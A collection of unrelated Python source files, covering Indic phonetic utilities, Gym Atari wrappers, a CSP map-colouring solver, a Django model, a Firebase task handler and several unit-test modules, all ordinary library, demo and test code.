PHONETIC_VECTOR_LENGTH=38
""" Start offset for the phonetic feature vector in the phonetic data vector """
PHONETIC_VECTOR_START_OFFSET=6
## PHONETIC PROPERTIES in order in which they occur in the vector
## This list must be in sync with the keys in the PV_PROP_RANGES dictionary
PV_PROP=['basic_type',
'vowel_length',
'vowel_strength',
'vowel_status',
'consonant_type',
'articulation_place',
'aspiration',
'voicing',
'nasalization',
'vowel_horizontal',
'vowel_vertical',
'vowel_roundness',
]
###
# Bit vector ranges for various properties
###
PV_PROP_RANGES={
'basic_type': [0,6],
'vowel_length': [6,8],
'vowel_strength': [8,11],
'vowel_status': [11,13],
'consonant_type': [13,18],
'articulation_place': [18,23],
'aspiration': [23,25],
'voicing': [25,27],
'nasalization': [27,29],
'vowel_horizontal': [29,32],
'vowel_vertical': [32,36],
'vowel_roundness': [36,38],
}
####
# Indexes into the Phonetic Vector
####
PVIDX_BT_VOWEL=0
PVIDX_BT_CONSONANT=1
PVIDX_BT_NUKTA=2
PVIDX_BT_HALANT=3
PVIDX_BT_ANUSVAAR=4
PVIDX_BT_MISC=5
PVIDX_BT_S=PVIDX_BT_VOWEL
PVIDX_BT_E=PVIDX_BT_MISC+1
PVIDX_VSTAT_DEP=12
#####
# Unicode information about characters
#####
SCRIPT_OFFSET_START=0
SCRIPT_OFFSET_RANGE=0x80
def init():
"""
To be called by library loader, do not call it in your program
"""
global ALL_PHONETIC_DATA, ALL_PHONETIC_VECTORS, TAMIL_PHONETIC_DATA, TAMIL_PHONETIC_VECTORS, PHONETIC_VECTOR_LENGTH, PHONETIC_VECTOR_START_OFFSET
ALL_PHONETIC_DATA=pd.read_csv(os.path.join(common.get_resources_path(),'script','all_script_phonetic_data.csv'),encoding='utf-8')
TAMIL_PHONETIC_DATA=pd.read_csv(os.path.join(common.get_resources_path(),'script','tamil_script_phonetic_data.csv'),encoding='utf-8')
ALL_PHONETIC_VECTORS= ALL_PHONETIC_DATA.iloc[:,PHONETIC_VECTOR_START_OFFSET:].values
TAMIL_PHONETIC_VECTORS=TAMIL_PHONETIC_DATA.iloc[:,PHONETIC_VECTOR_START_OFFSET:].values
PHONETIC_VECTOR_LENGTH=ALL_PHONETIC_VECTORS.shape[1]
def is_supported_language(lang):
return lang in list(li.SCRIPT_RANGES.keys())
def get_offset(c,lang):
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
return ord(c)-li.SCRIPT_RANGES[lang][0]
def offset_to_char(off,lang):
"""
Applicable to Brahmi derived Indic scripts
"""
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
return chr(off+li.SCRIPT_RANGES[lang][0])
def is_indiclang_char(c,lang):
"""
Applicable to Brahmi derived Indic scripts
Note that DANDA and DOUBLE_DANDA have the same Unicode codepoint for all Indic scripts
"""
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
o=get_offset(c,lang)
return (o>=SCRIPT_OFFSET_START and o<SCRIPT_OFFSET_RANGE) \
or ord(c)==li.DANDA or ord(c)==li.DOUBLE_DANDA
def in_coordinated_range_offset(c_offset):
"""
Applicable to Brahmi derived Indic scripts
"""
return (c_offset>=li.COORDINATED_RANGE_START_INCLUSIVE and c_offset<=li.COORDINATED_RANGE_END_INCLUSIVE)
def in_coordinated_range(c,lang):
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
return in_coordinated_range_offset(get_offset(c,lang))
def get_phonetic_info(lang):
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
phonetic_data= ALL_PHONETIC_DATA if lang!=li.LC_TA else TAMIL_PHONETIC_DATA
phonetic_vectors= ALL_PHONETIC_VECTORS if lang!=li.LC_TA else TAMIL_PHONETIC_VECTORS
return (phonetic_data, phonetic_vectors)
def invalid_vector():
## TODO: check if np datatype is correct?
return np.array([0]*PHONETIC_VECTOR_LENGTH)
def get_phonetic_feature_vector(c,lang):
offset=get_offset(c,lang)
if not in_coordinated_range_offset(offset):
return invalid_vector()
phonetic_data, phonetic_vectors= get_phonetic_info(lang)
if phonetic_data.ix[offset,'Valid Vector Representation']==0:
return invalid_vector()
return phonetic_vectors[offset]
def get_phonetic_feature_vector_offset(offset,lang):
if not in_coordinated_range_offset(offset):
return invalid_vector()
phonetic_data, phonetic_vectors= get_phonetic_info(lang)
if phonetic_data.ix[offset,'Valid Vector Representation']==0:
return invalid_vector()
return phonetic_vectors[offset]
### Unary operations on vectors
def is_valid(v):
return np.sum(v)>0
def is_vowel(v):
return v[PVIDX_BT_VOWEL]==1
def is_consonant(v):
return v[PVIDX_BT_CONSONANT]==1
def is_halant(v):
return v[PVIDX_BT_HALANT]==1
def is_nukta(v):
return v[PVIDX_BT_NUKTA]==1
def is_anusvaar(v):
return v[PVIDX_BT_ANUSVAAR]==1
def is_misc(v):
return v[PVIDX_BT_MISC]==1
def is_dependent_vowel(v):
return is_vowel(v) and v[PVIDX_VSTAT_DEP]==1
def is_plosive(v):
return is_consonant(v) and get_property_vector(v,'consonant_type')[0]==1
### Binary operations on phonetic vectors
def or_vectors(v1,v2):
return np.array([ 1 if (b1+b2)>=1 else 0 for b1,b2 in zip(v1,v2) ])
def xor_vectors(v1,v2):
return np.array([ 1 if b1!=b2 else 0 for b1,b2 in zip(v1,v2) ])
### Getting properties from phonetic vectors
def get_property_vector(v,prop_name):
return v[PV_PROP_RANGES[prop_name][0]:PV_PROP_RANGES[prop_name][1]]
def get_property_value(v,prop_name):
factor_bits=get_property_vector(v,prop_name).tolist()
v=0
c=1
for b in factor_bits[::-1]:
v+=(c*b)
c=c*2.0
return int(v)
def lcsr_indic(srcw,tgtw,slang,tlang):
"""
compute the Longest Common Subsequence Ratio (LCSR) between two strings at the character level.
This works for Indic scripts by mapping both languages to a common script
srcw: source language string
tgtw: source language string
slang: source language
tlang: target language
"""
score_mat=np.zeros((len(srcw)+1,len(tgtw)+1))
for si,sc in enumerate(srcw,1):
for ti,tc in enumerate(tgtw,1):
so=get_offset(sc,slang)
to=get_offset(tc,tlang)
if in_coordinated_range_offset(so) and in_coordinated_range_offset(to) and so==to:
score_mat[si,ti]=score_mat[si-1,ti-1]+1.0
elif not (in_coordinated_range_offset(so) or in_coordinated_range_offset(to)) and sc==tc:
score_mat[si,ti]=score_mat[si-1,ti-1]+1.0
else:
score_mat[si,ti]= max(
score_mat[si,ti-1],
score_mat[si-1,ti])
return (score_mat[-1,-1]/float(max(len(srcw),len(tgtw))),float(len(srcw)),float(len(tgtw)))
def lcsr_any(srcw,tgtw):
"""
LCSR computation if both languages have the same script
"""
score_mat=np.zeros((len(srcw)+1,len(tgtw)+1))
for si,sc in enumerate(srcw,1):
for ti,tc in enumerate(tgtw,1):
if sc==tc:
score_mat[si,ti]=score_mat[si-1,ti-1]+1.0
else:
score_mat[si,ti]= max(
score_mat[si,ti-1],
score_mat[si-1,ti])
return (score_mat[-1,-1]/float(max(len(srcw),len(tgtw))),float(len(srcw)),float(len(tgtw)))
def lcsr(srcw,tgtw,slang,tlang):
"""
compute the Longest Common Subsequence Ratio (LCSR) between two strings at the character level.
srcw: source language string
tgtw: source language string
slang: source language
tlang: target language
"""
if slang==tlang or not is_supported_language(slang) or not is_supported_language(tlang):
return lcsr_any(srcw,tgtw,slang,tlang)
else:
return lcsr_indic(srcw,tgtw)
|
import endpoints
import logging
import uuid
import urllib
import json
from httplib2 import Http
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from protorpc import remote
from protorpc import message_types
from google.appengine.datastore.datastore_query import Cursor
from oauth2client.contrib.appengine import AppAssertionCredentials
from oauth2client.client import GoogleCredentials
from protorpc import remote
from google.appengine.api import taskqueue
from apps.handlers import BaseHandler
from apps.metagame.controllers.factions import FactionsController
from apps.metagame.controllers.zones import ZonesController
from configuration import *
_FIREBASE_SCOPES = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email']
class FactionUpdateFirebaseHandler(BaseHandler):
def post(self):
logging.info("[TASK] FactionUpdateFirebaseHandler")
key_id = self.request.get('key_id')
faction = FactionsController().get_by_key_id(int(key_id))
if not faction:
logging.error('faction not found')
return
## get the zones that this faction currently controls?
## link back to the region/map in html
zoneController = ZonesController()
zones_json = []
zones = zoneController.list_by_factionKeyId(faction.key.id())
for zone in zones:
zones_json.append(zone.to_json())
faction.zones = zones_json
faction_json = json.dumps(faction.to_json_with_zones() )
credentials = GoogleCredentials.get_application_default().create_scoped(_FIREBASE_SCOPES)
http_auth = credentials.authorize(Http())
headers = {"Content-Type": "application/json"}
URL = "%s/factions/%s.json" % (FIREBASE_DATABASE_ROOT, faction.key.id())
resp, content = http_auth.request(URL,
"PUT",
##"PUT", ## Write or replace data to a defined path,
faction_json,
headers=headers)
logging.info(resp)
logging.info(content)
|
import re
def sanitize(text, patterns_replacements):
"""Arg patterns_replacements is a list of tuples (regex pattern, string to replace the match with)"""
try:
text = text.strip()
for rep in patterns_replacements:
text = re.sub(rep[0], rep[1], text)
return ' '.join(text.split())
except (AttributeError, KeyError):
return ''
|
import pytest
def test_get_blocks_nonexistent(parser):
result = parser.get_blocks(dict())
assert result == False
def test_get_blocks_empty(parser, empty_sb3):
result = parser.get_blocks(empty_sb3)
assert type(result) == dict
assert len(result) == 0
assert result == {}
def test_get_blocks_full(parser, full_sb3):
result = parser.get_blocks(full_sb3)
assert type(result) == dict
assert len(result) == 20
lengths = {
"event_whenflagclicked": 1,
"control_wait": 1,
"control_repeat": 1,
"motion_movesteps": 1,
"motion_ifonedgebounce": 1,
"event_broadcast": 1,
"data_showvariable": 1,
"looks_nextcostume": 1,
"looks_sayforsecs": 1,
"event_whenbroadcastreceived": 1,
"sound_changevolumeby": 1,
"procedures_call": 1,
"procedures_definition": 1,
"sensing_askandwait": 1,
"control_if": 1,
"operator_gt": 1,
"sensing_answer": 1,
"data_setvariableto": 1,
"operator_random": 1,
"sound_playuntildone": 1
}
for block in result:
assert len(result[block]) == lengths[block]
def test_get_blocks_no_orphans(parser, orphans_sb3):
result = parser.get_blocks(orphans_sb3, False)
assert type(result) == dict
assert len(result) == 2
def test_get_blocks_orphans(parser, orphans_sb3):
result = parser.get_blocks(orphans_sb3)
assert type(result) == dict
assert len(result) == 6
|
import unittest
import arff
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
OBJ = {
'description': '\nXOR Dataset\n\n\n',
'relation': 'XOR',
'attributes': [
('input1', 'REAL'),
('input2', 'REAL'),
('y', 'REAL'),
],
'data': [
[0.0, 0.0, 0.0],
[0.0, 1.0, 1.0],
[1.0, 0.0, 1.0],
[1.0, 1.0, 0.0]
]
}
ARFF = '''%
% XOR Dataset
%
%
@RELATION XOR
@ATTRIBUTE input1 REAL
@ATTRIBUTE input2 REAL
@ATTRIBUTE y REAL
@DATA
0.0,0.0,0.0
0.0,1.0,1.0
1.0,0.0,1.0
1.0,1.0,0.0
'''
class TestLoadDump(unittest.TestCase):
def get_dumps(self):
dumps = arff.dumps
return dumps
def get_loads(self):
loads = arff.loads
return loads
def test_simple(self):
dumps = self.get_dumps()
loads = self.get_loads()
arff = ARFF
obj = None
count = 0
while count < 10:
count += 1
obj = loads(arff)
arff = dumps(obj)
self.assertEqual(arff, ARFF)
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
@author: avaldes
"""
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mlp import MLP
nb_black = 50
nb_red = 50
nb_green = 50
nb_data = nb_black + nb_red + nb_green
s = np.linspace(0, 2*np.pi, nb_black)
x_black = np.vstack([np.cos(s), np.sin(s)]).T
x_red = 2 * np.vstack([np.cos(s), np.sin(s)]).T
x_green = 3 * np.vstack([np.cos(s), np.sin(s)]).T
x_data = np.vstack((x_black, x_red, x_green))
t_list = [1, 0, 0] * nb_black + [0, 1, 0] * nb_red + [0, 0, 1] * nb_green
t_data = np.asarray(t_list).reshape(nb_data, 3)
D = x_data.shape[1]
K = 3
K_list = [D, 100, 50, K]
activation_functions = [MLP.relu] * 2 + [MLP.softmax]
diff_activation_functions = [MLP.drelu] * 2
methods = ['SGD', 'momentum', 'nesterov', 'adagrad',
'adadelta', 'RMS_prop', 'adam']
fig, ax = plt.subplots(2, 4)
list_pairs = [(r, c) for r in range(2) for c in range(4)]
for counter, method in enumerate(methods):
method = methods[counter]
mlp = MLP(K_list,
activation_functions,
diff_activation_functions,
init_seed=5)
mlp.train(x_data, t_data,
epochs=200, batch_size=20,
eta=0.01,
method=method,
print_cost=True,
initialize_weights=True)
delta = 0.05
a, b = -4, 4
x = np.arange(a, b, delta)
y = np.arange(a, b, delta)
X, Y = np.meshgrid(x, y)
x_pts = np.vstack((X.flatten(), Y.flatten())).T
mlp.get_activations_and_units(x_pts)
grid_size = X.shape[0]
print(method)
r, c = list_pairs[counter]
curr_axes = ax[r, c]
curr_axes.axis('equal')
curr_axes.scatter(X, Y, facecolors=mlp.y)
curr_axes.scatter(x_data[:, 0], x_data[:, 1],
marker='o',
s=1,
color='black')
curr_axes.set_xlim(-4, 4)
curr_axes.set_ylim(-4, 4)
curr_axes.set_title(method)
mlp.get_activations_and_units(x_data)
error = mlp.softmax_cross_entropy(mlp.y, t_data)
curr_axes.set_xlabel('error= %.3f' % error)
plt.show()
|
from collections import deque
import gym
import numpy as np
from gym import spaces
from PIL import Image
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset()
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(
1, self.noop_max + 1) # pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(0)
if done:
obs = self.env.reset()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert somtimes we stay in lives == 0 condtion for a few frames
# so its important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset()
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
last_info = {}
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, last_info
def reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class MaxEnv(gym.Wrapper):
def __init__(self, env, skip=4):
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, reward, done, info
def reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class SkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
self._skip = skip
def step(self, action):
total_reward = 0.0
last_info = {}
done = None
obs = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
total_reward += reward
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
if done:
break
return obs, total_reward, done, last_info
class ClipRewardEnv(gym.RewardWrapper):
def _reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
gym.ObservationWrapper.__init__(self, env)
self.res = 84
self.observation_space = spaces.Box(
low=0, high=255, shape=(self.res, self.res, 1))
def _observation(self, obs):
frame = np.dot(obs.astype('float32'), np.array(
[0.299, 0.587, 0.114], 'float32'))
frame = np.array(Image.fromarray(frame).resize((self.res, self.res),
resample=Image.BILINEAR), dtype=np.uint8)
return frame.reshape((self.res, self.res, 1))
class FrameStack(gym.Wrapper):
default_k = 3
def __init__(self, env, k=None):
"""Buffer observations and stack across channels (last axis)."""
gym.Wrapper.__init__(self, env)
if k is None:
k = FrameStack.default_k
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
# assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = spaces.Box(
low=0, high=255, shape=(shp[0], shp[1], k * shp[2]))
def reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._observation()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._observation(), reward, done, info
def _observation(self):
assert len(self.frames) == self.k
obs = np.concatenate(self.frames, axis=2)
assert list(np.shape(obs)) == list(self.observation_space.shape)
return obs
class SkipAndFrameStack(gym.Wrapper):
def __init__(self, env, skip=4, k=4):
"""Equivalent to SkipEnv(FrameStack(env, k), skip) but more efficient"""
gym.Wrapper.__init__(self, env)
self.k = k
self._skip = skip
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = spaces.Box(
low=0, high=255, shape=(shp[0], shp[1], k))
def reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._observation()
def step(self, action):
total_reward = 0.0
last_info = {}
done = None
for _ in range(self._skip):
ob, reward, done, info = self.env.step(action)
total_reward += reward
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
self.frames.append(ob)
if done:
break
return self._observation(), total_reward, done, last_info
def _observation(self):
assert len(self.frames) == self.k
return np.concatenate(self.frames, axis=2)
class ObsExpandWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
low = env.observation_space.low
high = env.observation_space.high
self.observation_space = gym.spaces.Box(low if np.isscalar(low) else np.asarray(low).item(0), high if np.isscalar(high) else np.asarray(high).item(0),
shape=(
env.observation_space.shape[0],
env.observation_space.shape[1] if len(
env.observation_space.shape) >= 2 else 1,
env.observation_space.shape[2] if len(
env.observation_space.shape) >= 3 else 1
))
def reset(self):
ob = super().reset()
if ob.ndim == 1:
ob = ob[:, np.newaxis, np.newaxis]
elif ob.ndim == 2:
ob = ob[:, :, np.newaxis]
return ob
def step(self, action):
ob, r, d, _ = super().step(action)
if ob.ndim == 1:
ob = ob[:, np.newaxis, np.newaxis]
elif ob.ndim == 2:
ob = ob[:, :, np.newaxis]
return ob, r, d, _
class NoopFrameskipWrapper(gym.Wrapper):
def __init__(self, env, gamma=0.99):
super().__init__(env)
self.FRAMESKIP_ON_NOOP = 2
self.gamma = gamma
self.noop_phase = False
self.skipped_already = 0
def _is_noop(self, action):
return action == 0
def step(self, action):
if self._is_noop(action):
R = 0
last_info = {}
ob = None
d = False
for i in range(self.FRAMESKIP_ON_NOOP):
ob, r, d, info = super().step(action)
R += r
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
if d:
break
return ob, R, d, last_info
else:
return super().step(action)
class BreakoutContinuousActionWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.action_space = spaces.Box(-1, 1, shape=[1])
def step(self, action):
if action < -1 / 3:
action = 3
elif action >= -1 / 3 and action <= 1 / 3:
action = 0
else:
action = 2
return self.env.step(action)
def wrap_deepmind(env, episode_life=True, clip_rewards=True):
"""Configure environment for DeepMind-style Atari.
Note: this does not include frame stacking!"""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
return env
def wrap_deepmind_with_framestack(env, episode_life=True, clip_rewards=True, framestack_k=4, frameskip_k=4, noop_max=30):
"""Configure environment for DeepMind-style Atari."""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=noop_max)
env = MaxAndSkipEnv(env, skip=frameskip_k)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
env = FrameStack(env, k=framestack_k)
return env
wrap_atari = wrap_deepmind_with_framestack
|
#!/usr/bin/env python
import sys
from setuptools import setup, find_packages, Extension
from distutils import ccompiler
VERSION = (0, 0, 1)
VERSION_STR = ".".join([str(x) for x in VERSION])
EXTRA_OPT = 0
if "--extra-optimization" in sys.argv:
# Support legacy output format functions
EXTRA_OPT = 1
sys.argv.remove("--extra-optimization")
if ccompiler.get_default_compiler() == "msvc":
extra_compile_args = ["/Wall"]
if EXTRA_OPT:
extra_compile_args.insert(0, "/O2")
else:
extra_compile_args.insert(0, "/Ot")
else:
extra_compile_args = ["-std=c99", "-Wall", "-DFORTIFY_SOURCE=2", "-fstack-protector"]
if EXTRA_OPT:
extra_compile_args.insert(0, "-march=native")
extra_compile_args.insert(0, "-O3")
else:
extra_compile_args.insert(0, "-O2")
setup(
name='zstd001',
version=VERSION_STR,
description="ZSTD Bindings for Python (alpha)",
author='Sergey Dryabzhinsky',
author_email='sergey.dryabzhinsky@gmail.com',
url='https://github.com/sergey-dryabzhinsky/python-zstd',
packages=find_packages('src'),
package_dir={'': 'src'},
ext_modules=[
Extension('_zstd001', [
'src/zstd.c',
'src/python-zstd.c'
], extra_compile_args=extra_compile_args)
],
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Programming Language :: C',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
],
)
|
import Animal, Dog, Cat
if __name__ == '__main__':
print "Hello World!"
dogName = raw_input("\nWhat is your dog's name?" )
if dogName:
Fido = Dog.Dog(dogName)
Fido.getSound()
Fluffy = Cat.Cat("Fluffy")
Fluffy.getSound()
|
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class Post(models.Model):
title = models.CharField(max_length=100, default='default title')
slug = models.TextField(default='emptyslug', unique=True)
text = models.TextField()
pub_date = models.DateTimeField("date published", auto_now_add=True)
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name="Посты")
image = models.ImageField(null=True, blank=True)
class Meta:
ordering = ['-pub_date']
verbose_name = 'Пост'
verbose_name_plural = 'Посты'
|
# Copyright 2019–2020 CEA
#
# Author: Yann Leprince <yann.leprince@cea.fr>
#
# Licensed under the Apache Licence, Version 2.0 (the "Licence");
# you may not use this file except in compliance with the Licence.
# You may obtain a copy of the Licence at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Licence is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the Licence for the specific language governing permissions and
# limitations under the Licence.
import os
import pytest
import requests
@pytest.fixture
def base_url():
url = os.environ.get('HBP_SPATIAL_BACKEND_TEST_URL')
if url:
return url
else:
# return 'https://hbp-spatial-backend.apps.hbp.eu/'
# return 'https://hbp-spatial-backend.apps-dev.hbp.eu/'
return 'http://127.0.0.1:5000/'
class TransformRequester:
def __init__(self, base_url):
self.base_url = base_url
def transform(self, source_space, target_space, points):
r = requests.post(self.base_url + 'v1/transform-points',
json={
'source_space': source_space,
'target_space': target_space,
'source_points': points,
}, headers={
'Cache-Control': 'no-cache',
})
r.raise_for_status()
response_body = r.json()
return [
(x, y, z) for (x, y, z) in response_body['target_points']
]
@pytest.fixture
def transform_requester(base_url):
return TransformRequester(base_url)
def points_approx_equal(test_points, reference_points, tol=0.1):
for test_point, reference_point in zip(test_points, reference_points):
return all(abs(t - r) < tol
for t, r in zip(test_point, reference_point))
def test_health(base_url):
r = requests.get(base_url + 'health',
headers={
'Cache-Control': 'no-cache',
})
assert r.status_code == 200
# Shorthands
MNI152 = 'MNI 152 ICBM 2009c Nonlinear Asymmetric'
COLIN27 = 'MNI Colin 27'
BIGBRAIN = 'Big Brain (Histology)'
INFANT = 'Infant Atlas'
TEST_POINTS_FOR_TEMPLATE = {
# All the templates can be tested with the default points (below)
}
@pytest.mark.parametrize('source_space,intermediate_space', [
(MNI152, BIGBRAIN),
(BIGBRAIN, COLIN27),
(COLIN27, INFANT),
(INFANT, MNI152),
])
def test_roundtrip(transform_requester, source_space, intermediate_space):
# Default test points
orig_points = TEST_POINTS_FOR_TEMPLATE.get(source_space, [
(0, 0, 0),
(10, 0, 0),
(0, 10, 0),
])
intermediate_points = transform_requester.transform(
source_space, intermediate_space, orig_points)
roundtripped_points = transform_requester.transform(
intermediate_space, source_space, intermediate_points)
assert points_approx_equal(roundtripped_points, orig_points)
|
from random import shuffle
class CSP:
def __init__(self, variables, domains, neighbours, constraints):
self.variables = variables
self.domains = domains
self.neighbours = neighbours
self.constraints = constraints
def backtracking_search(self):
return self.recursive_backtracking({})
def recursive_backtracking(self, assignment):
if self.is_complete(assignment):
return assignment
var = self.select_unassigned_variable(assignment)
for value in self.order_domain_values(var, assignment):
if self.is_consistent(var, value, assignment):
assignment[var] = value
results = self.recursive_backtracking(assignment)
if results is not None:
return results
assignment[var] = None
return None
def select_unassigned_variable(self, assignment):
for variable in self.variables:
if variable not in assignment:
return variable
def is_complete(self, assignment):
for variable in self.variables:
if variable not in assignment:
return False
return True
def order_domain_values(self, variable, assignment):
all_values = self.domains[variable][:]
# shuffle(all_values)
return all_values
def is_consistent(self, variable, value, assignment):
if not assignment:
return True
for constraint in self.constraints.values():
for neighbour in self.neighbours[variable]:
if neighbour not in assignment:
continue
neighbour_value = assignment[neighbour]
if not constraint(variable, value, neighbour, neighbour_value):
return False
return True
def create_australia_csp():
wa, q, t, v, sa, nt, nsw = 'WA', 'Q', 'T', 'V', 'SA', 'NT', 'NSW'
values = ['Red', 'Green', 'Blue']
variables = [wa, q, t, v, sa, nt, nsw]
domains = {
wa: values[:],
q: values[:],
t: values[:],
v: values[:],
sa: values[:],
nt: values[:],
nsw: values[:],
}
neighbours = {
wa: [sa, nt],
q: [sa, nt, nsw],
t: [],
v: [sa, nsw],
sa: [wa, nt, q, nsw, v],
nt: [sa, wa, q],
nsw: [sa, q, v],
}
def constraint_function(first_variable, first_value, second_variable, second_value):
return first_value != second_value
constraints = {
wa: constraint_function,
q: constraint_function,
t: constraint_function,
v: constraint_function,
sa: constraint_function,
nt: constraint_function,
nsw: constraint_function,
}
return CSP(variables, domains, neighbours, constraints)
if __name__ == '__main__':
australia = create_australia_csp()
result = australia.backtracking_search()
for area, color in sorted(result.items()):
print("{}: {}".format(area, color))
# Check at https://mapchart.net/australia.html
|
import re
from unittest import TestCase
import mock
from pandas import DataFrame
from shift_detector.checks.dq_metrics_check import DQMetricsCheck
from shift_detector.precalculations.store import Store
class TestDQMetricsCheck(TestCase):
def setUp(self):
sales1 = {'shift': ['A'] * 100, 'no_shift': ['C'] * 100}
sales2 = {'shift': ['B'] * 100, 'no_shift': ['C'] * 100}
numbers1 = {'cool_numbers': [1, 2, 3, 4] * 10}
numbers2 = {'cool_numbers': [1, 2, 3, 6] * 10}
self.df1 = DataFrame.from_dict(sales1)
self.df2 = DataFrame.from_dict(sales2)
self.df1_num = DataFrame.from_dict(numbers1)
self.df2_num = DataFrame.from_dict(numbers2)
self.store = Store(self.df1, self.df2)
self.store_num = Store(self.df1_num, self.df2_num)
self.check = DQMetricsCheck()
def test_init(self):
with self.subTest('normal analyzers should detect shift'):
self.check = DQMetricsCheck()
report = self.check.run(self.store_num)
explanations = report.explanation['numerical_categorical']['cool_numbers']
self.assertEqual(explanations[0].val1, 2.5)
self.assertEqual(explanations[0].val2, 3.0)
self.assertEqual(round(explanations[0].diff, 2), 0.2)
self.assertEqual(explanations[1].val1, 3.0)
self.assertEqual(explanations[1].val2, 5.0)
